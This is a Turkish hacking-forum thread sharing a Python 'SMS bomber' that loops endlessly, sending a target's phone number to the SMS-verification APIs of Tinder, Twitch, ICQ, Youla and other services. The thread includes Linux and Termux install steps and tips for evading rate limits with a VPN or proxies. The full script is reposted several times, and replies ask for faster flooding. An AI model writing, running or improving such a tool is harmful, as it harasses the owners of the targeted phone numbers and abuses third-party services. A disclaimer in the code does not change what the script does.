SMS Bomber Güncel Apiler

dvp

Yeni üye
23 Nis 2020
22
1
SMS Bomber Güncel Apiler -Artık Termuxta da çalışıyor...

Arkadaşlar bilindik sms bomberların çoğu aynı apileri kullanıyor bunları test edip çalışan apileri bulup hızlı ve kolay bir sms bomber hazırladım.
Uzun bir süre sonra sms atmamaya başlıyor VPN kullanıp ara sıra server değiştirirseniz çözülüyor ya da koda kendiniz proxy ekleyebilirsiniz.

Kullanmadan evvel unutmayın ki hiçbir sorumluluğu üstüme almıyorum, bu kodu kullanarak yapacağınız şeylerden kendinizin sorumlu olduğunu kabul edersiniz.

Numara kısmına numarayı yazarken başına 90 ülke kodunu koyarak girin.örn:9053xxxxxxxx

Kullanımı

1-Kullandığınız işletim sistemine göre git,py,py3 yükleyin
2- git clone https://github.com/0x0000029A/Sms_bomb.git
3- pip install colorama
4- pip install requests
5-python3 bomber.py ile çalıştırın
NOT: Durdurma seçeneği veya herhangi bir limit eklemedim durdurmak için terminali kapatın.

Termux için:

1-pkg install git
2-git clone https://github.com/0x0000029A/Sms_bomb.git
3-cd Sms_bomb
4-bash termux.sh

NOT: Durdurmak için CTRL+Z

https://github.com/0x0000029A/Sms_bomb

Kod:
import requests, random
import urllib.request
import colorama

"""
Kod ile yapacağınız herhangi bir işlemden ben sorumlu değilim. Bu riski göz önüne alarak kullanın.
This application is for private or educational purposes only.
Do not use it on other people without their permission. 
I do not accept responsibility for caused by the use of this code.
By using the this code,you automatically accept that you yourself are criminally responsible for yourself and you are aware that it violates the guidelines.
"""

colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']

_phone = input('Enter Target Phone Number Without (+):')
_name = ''

for x in range(12):
	_name = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
	password = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
	username = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))

_phone9 = _phone[1:]

num = _phone
numplus = '+' + num
print(random.choice(colors))
while True:
#1
    try:
        print(requests.post('https://youla.ru/web-api/auth/request_code', json = {"phone":numplus}))
    except:
        print("Failed.")
#2
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', json= {"phone_number":numplus}))
    except:
        print("Failed.")
#3
    try:
        print(requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php/?msisdn={}&locale=en&countryCode=ru&k=ic1rtwz1s1Hj1O0r&version=1&r=46763'.format(num)))
    except:
        print("Failed.")
#4
    try:
        print(requests.post('https://account.my.games/signup_send_sms/', data={'phone': _phone}))
    except:
        print("Failed.")
#5
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, headers={}))
    except:
        print("Failed.")
#6
    try:
        print(requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': _phone}))
    except:
        print("Failed.")
#7
    try:
        print(requests.post('https://passport.twitch.tv/register?trusted_request=true',json={"birthday": {"day": 11, "month": 11, "year": 1999},"client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True,"password": password, "phone_number": _phone,"username": username}))
    except:
        print("Failed.")
#8
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru',data={'phone_number': _phone}))
    except:
        print("Failed.")
    print(random.choice(colors))
 
Son düzenleme:
21 Nis 2020
206
20
Arkadaşlar bilindik sms bomberların çoğu aynı apileri kullanıyor bunları test edip çalışan apileri bulup hızlı ve kolay bir sms bomber hazırladım.
Uzun bir süre sonra sms atmamaya başlıyor VPN kullanıp ara sıra server değiştirirseniz çözülüyor ya da koda kendiniz proxy ekleyebilirsiniz.

Kullanmadan evvel unutmayın ki hiçbir sorumluluğu üstüme almıyorum yapacağınız şeylerden siz sorumlusunuz.

https://github.com/0x0000029A/Sms_bomb

Kod:
import requests, random
import urllib.request
import colorama

colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']

_phone = input('Enter Target Phone Number Without (+):')
_name = ''

for x in range(12):
	_name = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
	password = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
	username = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))

_phone9 = _phone[1:]

num = _phone
numplus = '+' + num
print(random.choice(colors))
while True:
#1
    try:
        print(requests.post('https://youla.ru/web-api/auth/request_code', json = {"phone":numplus}))
    except:
        print("Failed.")
#2
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', json= {"phone_number":numplus}))
    except:
        print("Failed.")
#3
    try:
        print(requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php/?msisdn={}&locale=en&countryCode=ru&k=ic1rtwz1s1Hj1O0r&version=1&r=46763'.format(num)))
    except:
        print("Failed.")
#4
    try:
        print(requests.post('https://account.my.games/signup_send_sms/', data={'phone': _phone}))
    except:
        print("Failed.")
#5
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, headers={}))
    except:
        print("Failed.")
#6
    try:
        print(requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': _phone}))
    except:
        print("Failed.")
#7
    try:
        print(requests.post('https://passport.twitch.tv/register?trusted_request=true',json={"birthday": {"day": 11, "month": 11, "year": 1999},"client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True,"password": password, "phone_number": _phone,"username": username}))
    except:
        print("Failed.")
#8
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru',data={'phone_number': _phone}))
    except:
        print("Failed.")
    print(random.choice(colors))

Kral bunu nasıl kullanıyoruz kısaca özet geçermisin araştırayım bilmiyorum kullanmak istiyorumda biraz linux bilgim var
 

dvp

Yeni üye
23 Nis 2020
22
1
Kral bunu nasıl kullanıyoruz kısaca özet geçermisin araştırayım bilmiyorum kullanmak istiyorumda biraz linux bilgim var

Tekrar düzenledim kullanım kısmı ekledim yakın vakitte termux içinde kullanımını eklerim zaman bulursam shell scriptini yazarım.
 

Rebelkan

Uzman üye
12 Şub 2019
1,955
965
Arkadaşlar bilindik sms bomberların çoğu aynı apileri kullanıyor bunları test edip çalışan apileri bulup hızlı ve kolay bir sms bomber hazırladım.
Uzun bir süre sonra sms atmamaya başlıyor VPN kullanıp ara sıra server değiştirirseniz çözülüyor ya da koda kendiniz proxy ekleyebilirsiniz.

Kullanmadan evvel unutmayın ki hiçbir sorumluluğu üstüme almıyorum yapacağınız şeylerden siz sorumlusunuz.

Kullanımı
1-Kullandığınız işletim sistemine göre git,py,py3 yükleyin
2- git clone https://github.com/0x0000029A/Sms_bomb.git
3- pip install colorama
4- pip install requests
5-python3 bomber.py ile çalıştırın

https://github.com/0x0000029A/Sms_bomb

Kod:
import requests, random
import urllib.request
import colorama

colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']

_phone = input('Enter Target Phone Number Without (+):')
_name = ''

for x in range(12):
	_name = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
	password = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
	username = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))

_phone9 = _phone[1:]

num = _phone
numplus = '+' + num
print(random.choice(colors))
while True:
#1
    try:
        print(requests.post('https://youla.ru/web-api/auth/request_code', json = {"phone":numplus}))
    except:
        print("Failed.")
#2
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', json= {"phone_number":numplus}))
    except:
        print("Failed.")
#3
    try:
        print(requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php/?msisdn={}&locale=en&countryCode=ru&k=ic1rtwz1s1Hj1O0r&version=1&r=46763'.format(num)))
    except:
        print("Failed.")
#4
    try:
        print(requests.post('https://account.my.games/signup_send_sms/', data={'phone': _phone}))
    except:
        print("Failed.")
#5
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, headers={}))
    except:
        print("Failed.")
#6
    try:
        print(requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': _phone}))
    except:
        print("Failed.")
#7
    try:
        print(requests.post('https://passport.twitch.tv/register?trusted_request=true',json={"birthday": {"day": 11, "month": 11, "year": 1999},"client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True,"password": password, "phone_number": _phone,"username": username}))
    except:
        print("Failed.")
#8
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru',data={'phone_number': _phone}))
    except:
        print("Failed.")
    print(random.choice(colors))






Süper! Teşekkürler..
 

selami1221

Yeni üye
11 Nis 2020
6
0
Aynen bende termuxtan yaptım gayet stabil ve hızlı emeği geçen arkadaşa tekrar teşekkür edelim .



TURKHACKTEAM.
 

Klaad

Üye
14 May 2020
51
0
Cevap: SMS Bomber Güncel Apiler -Artık Termuxta da çalışıyor...

python3 bomber.py yapıyorum ama olmuyor
python3: can't open file 'bomber.py': [Errno 2] No such file or directory
python3: can't open file 'bomber.py': [Errno 2] No such file or directory
 

Rowdzel

Üye
18 May 2020
57
14
Cevap: SMS Bomber Güncel Apiler -Artık Termuxta da çalışıyor...

Arkadaşlar bilindik sms bomberların çoğu aynı apileri kullanıyor bunları test edip çalışan apileri bulup hızlı ve kolay bir sms bomber hazırladım.
Uzun bir süre sonra sms atmamaya başlıyor VPN kullanıp ara sıra server değiştirirseniz çözülüyor ya da koda kendiniz proxy ekleyebilirsiniz.

Kullanmadan evvel unutmayın ki hiçbir sorumluluğu üstüme almıyorum, bu kodu kullanarak yapacağınız şeylerden kendinizin sorumlu olduğunu kabul edersiniz.

Numara kısmına numarayı yazarken başına 90 ülke kodunu koyarak girin.örn:9053xxxxxxxx

Kullanımı

1-Kullandığınız işletim sistemine göre git,py,py3 yükleyin
2- git clone https://github.com/0x0000029A/Sms_bomb.git
3- pip install colorama
4- pip install requests
5-python3 bomber.py ile çalıştırın

Termux için:

1-pkg install git
2-git clone https://github.com/0x0000029A/Sms_bomb.git
3-cd Sms_bomb
4-bash termux.sh


https://github.com/0x0000029A/Sms_bomb

Kod:
import requests, random
import urllib.request
import colorama

"""
Kod ile yapacağınız herhangi bir işlemden ben sorumlu değilim. Bu riski göz önüne alarak kullanın.
This application is for private or educational purposes only.
Do not use it on other people without their permission. 
I do not accept responsibility for caused by the use of this code.
By using the this code,you automatically accept that you yourself are criminally responsible for yourself and you are aware that it violates the guidelines.
"""

colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']

_phone = input('Enter Target Phone Number Without (+):')
_name = ''

for x in range(12):
	_name = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
	password = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
	username = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))

_phone9 = _phone[1:]

num = _phone
numplus = '+' + num
print(random.choice(colors))
while True:
#1
    try:
        print(requests.post('https://youla.ru/web-api/auth/request_code', json = {"phone":numplus}))
    except:
        print("Failed.")
#2
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', json= {"phone_number":numplus}))
    except:
        print("Failed.")
#3
    try:
        print(requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php/?msisdn={}&locale=en&countryCode=ru&k=ic1rtwz1s1Hj1O0r&version=1&r=46763'.format(num)))
    except:
        print("Failed.")
#4
    try:
        print(requests.post('https://account.my.games/signup_send_sms/', data={'phone': _phone}))
    except:
        print("Failed.")
#5
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, headers={}))
    except:
        print("Failed.")
#6
    try:
        print(requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': _phone}))
    except:
        print("Failed.")
#7
    try:
        print(requests.post('https://passport.twitch.tv/register?trusted_request=true',json={"birthday": {"day": 11, "month": 11, "year": 1999},"client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True,"password": password, "phone_number": _phone,"username": username}))
    except:
        print("Failed.")
#8
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru',data={'phone_number': _phone}))
    except:
        print("Failed.")
    print(random.choice(colors))

Eline Sağlık.
 

B0R4N

Katılımcı Üye
13 Kas 2019
314
2
nasıl durdurcam kendime attım durmuyor

acil cevap bekliyorum tel kafayı yedi çok iyi yapmışsın ellerine sağlık
 
Moderatör tarafında düzenlendi:

Klaad

Üye
14 May 2020
51
0
Cevap: SMS Bomber Güncel Apiler -Artık Termuxta da çalışıyor...

Arkadaşlar bilindik sms bomberların çoğu aynı apileri kullanıyor bunları test edip çalışan apileri bulup hızlı ve kolay bir sms bomber hazırladım.
Uzun bir süre sonra sms atmamaya başlıyor VPN kullanıp ara sıra server değiştirirseniz çözülüyor ya da koda kendiniz proxy ekleyebilirsiniz.

Kullanmadan evvel unutmayın ki hiçbir sorumluluğu üstüme almıyorum, bu kodu kullanarak yapacağınız şeylerden kendinizin sorumlu olduğunu kabul edersiniz.

Numara kısmına numarayı yazarken başına 90 ülke kodunu koyarak girin.örn:9053xxxxxxxx

Kullanımı

1-Kullandığınız işletim sistemine göre git,py,py3 yükleyin
2- git clone https://github.com/0x0000029A/Sms_bomb.git
3- pip install colorama
4- pip install requests
5-python3 bomber.py ile çalıştırın

Termux için:

1-pkg install git
2-git clone https://github.com/0x0000029A/Sms_bomb.git
3-cd Sms_bomb
4-bash termux.sh


https://github.com/0x0000029A/Sms_bomb

Kod:
import requests, random
import urllib.request
import colorama

"""
Kod ile yapacağınız herhangi bir işlemden ben sorumlu değilim. Bu riski göz önüne alarak kullanın.
This application is for private or educational purposes only.
Do not use it on other people without their permission. 
I do not accept responsibility for caused by the use of this code.
By using the this code,you automatically accept that you yourself are criminally responsible for yourself and you are aware that it violates the guidelines.
"""

colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']

_phone = input('Enter Target Phone Number Without (+):')
_name = ''

for x in range(12):
	_name = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
	password = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
	username = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))

_phone9 = _phone[1:]

num = _phone
numplus = '+' + num
print(random.choice(colors))
while True:
#1
    try:
        print(requests.post('https://youla.ru/web-api/auth/request_code', json = {"phone":numplus}))
    except:
        print("Failed.")
#2
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', json= {"phone_number":numplus}))
    except:
        print("Failed.")
#3
    try:
        print(requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php/?msisdn={}&locale=en&countryCode=ru&k=ic1rtwz1s1Hj1O0r&version=1&r=46763'.format(num)))
    except:
        print("Failed.")
#4
    try:
        print(requests.post('https://account.my.games/signup_send_sms/', data={'phone': _phone}))
    except:
        print("Failed.")
#5
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, headers={}))
    except:
        print("Failed.")
#6
    try:
        print(requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': _phone}))
    except:
        print("Failed.")
#7
    try:
        print(requests.post('https://passport.twitch.tv/register?trusted_request=true',json={"birthday": {"day": 11, "month": 11, "year": 1999},"client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True,"password": password, "phone_number": _phone,"username": username}))
    except:
        print("Failed.")
#8
    try:
        print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru',data={'phone_number': _phone}))
    except:
        print("Failed.")
    print(random.choice(colors))

Aga bunun hızlısını yapamaz mısın böyle 50 tane felan atsa saniyeler arasında çok iyi olur
 

dvp

Yeni üye
23 Nis 2020
22
1
Durdurmak için ne yapiyoruz?

Durdurmak için herhangi bir şey eklemedim termuxta CTRL+Z yaparak durdurabilirsin win ortamında ise kapat direkt zaten bi yerden sonra sms atmamaya başlıyor


Teşekkürler

linuxta çalıştıramadım

Bugün bakacağım bir eksiklik varsa düzeltirim dostum

python3 bomber.py yapıyorum ama olmuyor
python3: can't open file 'bomber.py': [Errno 2] No such file or directory
python3: can't open file 'bomber.py': [Errno 2] No such file or directory

Dizine girip yapman gerekiyor bomber.py yi bulamamış büyük ihtimal dizine girmedin
 
Moderatör tarafında düzenlendi:

dvp

Yeni üye
23 Nis 2020
22
1
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.